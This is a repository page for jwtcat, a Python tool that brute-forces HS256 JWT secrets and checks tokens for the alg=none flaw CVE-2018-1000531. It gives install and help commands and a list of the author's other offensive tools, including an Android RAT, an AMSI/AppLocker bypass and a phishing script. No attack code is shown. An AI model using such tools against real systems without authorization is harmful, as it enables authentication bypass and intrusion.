• Stars
    star
    283
  • Rank 146,066 (Top 3 %)
  • Language
    Python
  • License
    Apache License 2.0
  • Created almost 8 years ago
  • Updated about 2 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

A CPU-based JSON Web Token (JWT) cracker and - to some extent - scanner.

jwtcat

Language License

A CPU-based JSON Web Token (JWT) cracker and - to some extent - scanner

jwtcat is a Python script designed to detect and exploit well-known cryptographic flaws present in JSON Web Token (JWT).

These vulnerabilities, if successfully exploited by an adversary could allow authentication bypass, information disclosure and could ultimately lead to the compromise of an entire information system.

More information about JWT vulnerabilities can be found at:

Features

  • Test against the following vulnerabilitie(s):
    • CVE-2018-1000531: JWT signature bypass due to the use of None hashing algorithm (alg=none)
  • Guessing attacks against JWT private keys signed with the HS256 hashing algorithm:
    • Brute-force attacks
    • Wordlist attacks

Requirements

jwtcat is fully written in Python 3 and requires a minimum of Python 3.6 in addition to the following libraries:

Installation

  1. Clone the repository:

    git clone https://github.com/AresS31/jwtcat
    cd jwtcat
  2. (Optional but recommended) Create and activate a new Python virtual environment:

    1. Create the virtual environment:

      python -m venv env
    2. Activate the newly created environment:

      • On POSIX:

        source ./env/bin/activate
      • On Windows:

        ./env/Scripts/Activate.ps1
  3. Install dependencies:

    python -m pip install -r requirements.txt

Usage

  • To list the available options:

    python jwtcat.py -h
  • To list available options specific to brute force attacks:

    python jwtcat.py brute-force -h

    brute-force-demo

  • To list available options specific to wordlist attacks:

    python jwtcat.py wordlist -h

    wordlist-demo

  • To test a JWT against CVE-2018-1000531 and HS256 brute-force attacks:

    python jwtcat.py vulnerable -h

    vulnerable-demo

Roadmap

  • Implement additional attack vectors.
  • Implement support for multithreading or multiprocessing.
  • Implement support for the -tF, --token-file swicth.
  • Improve the code logic for:
    • TQDM integration with the logger.
  • Improve the script performances.

Changelog

v1.1 - May 2020:

  • Added checks to see if JWT is signed with HS256.
  • Added checks to see if JWT is vulnerable to CVE-2018-1000531.
  • Added potfile options.
  • Added support for brute-force attacks.
  • Code refactoring.
  • Improved the standard output formatting.
  • Switched from python-colorlog to coloredlogs.

Sponsor πŸ’–

If you want to support this project and appreciate the time invested in developping, maintening and extending it; consider donating toward my next cup of coffee. β˜•

It is easy, all you got to do is press the Sponsor button at the top of this page or alternatively click this link. πŸ’Έ

Reporting Issues

Found a bug? I would love to squash it! πŸ›

Please report all issues on the GitHub issues tracker.

Contributing

You would like to contribute to better this project? 🀩

Please submit all PRs on the GitHub pull requests tracker.

License

See LICENSE.

More Repositories

1

burpgpt

A Burp Suite extension that integrates OpenAI's GPT to perform an additional passive scan for discovering highly bespoke vulnerabilities, and enables running traffic-based analysis of any type.
Java
1,682
star
2

wirespy

Framework designed to automate various wireless networks attacks (the project was presented on Pentester Academy TV's toolbox in 2017).
Shell
518
star
3

swurg

Parse OpenAPI documents into Burp Suite for automating OpenAPI-based APIs security assessments (approved by PortSwigger for inclusion in their official BApp Store).
Java
176
star
4

xmlrpc-bruteforcer

Multi-threaded XMLRPC brute forcer using amplification attacks targeting WordPress installations prior to version 4.4.
Python
97
star
5

flarequench

Burp Suite plugin that adds additional checks to the passive scanner to reveal the origin IP(s) of Cloudflare-protected web applications.
Java
57
star
6

smbaudit

Perform various SMB-related attacks, particularly useful for testing large Active Directory environments.
Shell
41
star
7

sci

Framework designed to automate the process of assembly code injection (trojanising) within Android applications.
Smali
36
star
8

spyware

An Android RAT that collects various sensitive information in real-time and send them to the attacker databse.
Java
31
star
9

google-authenticator

Burp Suite plugin that dynamically generates Google 2FA codes for use in session handling rules (approved by PortSwigger for inclusion in their official BApp Store).
Java
26
star
10

pentest2xlsx

Excel parser for various pentesting tools.
Python
24
star
11

vulcan

A PowerShell script that simplifies life and therefore... phishing.
PowerShell
13
star
12

ness6nmap2xlsx

XLSX parser for nessus and nmap scan results.
Python
13
star
13

clm-rout

A C# program featuring an all-in-one bypass for CLM, AppLocker and AMSI using Runspace.
C#
12
star
14

testssl2xlsx

Excel parser for testssl scan results.
Python
11
star
15

copy-as-powershell-requests

Copy as PowerShell request(s) plugin for Burp Suite (approved by PortSwigger for inclusion in their official BApp Store).
Java
11
star
16

openvpn-stat

Display OpenVPN connected clients and their associated routing information in a user-friendly fashion.
Python
8
star
17

powershell-utils

A collection of PowerShell scripts for pentesting activities.
PowerShell
7
star
18

phishstat

Generate various type of statistics from phishing engagement results.
Python
7
star
19

raadef

An extensible Rust-based exploitation framework designed to audit/attack AzureAD environments.
Rust
6
star
20

centralized-messaging

Centralized messaging system.
C
5
star
21

bloodhound-utils

A collection of utility scripts/files designed to extend/facilitate Bloodhound capabilities.
5
star
22

solstice-pod-cves

Various CVEs for Solstice Pod from Mersive Technologies.
5
star
23

xor-crypter

XOR file encryptor.
C
4
star
24

distributed-chat

Distributed chat system.
Java
4
star
25

net-ninny-proxy

Web proxy coupled with a URL-based and content-based filter.
Java
4
star
26

c-q

Interactive, multi-users, multi-sessions web platform for quiz and courses.
PHP
3
star
27

docker_burp-enterprise

Attempt at dockerizing Burp Enterprise v2022.4.
Dockerfile
3
star
28

cve-2017-12945

Exploit for CVE-2017-12945.
Python
3
star
29

GLPI

Gestionnaire libre de parc informatique (Free Management of Computer Equipment).
Java
3
star
30

corellium-utils

A collection of utility scripts leveraging the Corellium API and designed to facilitate mobile pentesting.
JavaScript
3
star
31

dotfiles

A collection of dotfiles.
1
star
32

aress31

A ✨special✨ place that offers an insight into a subset of my work.
1
star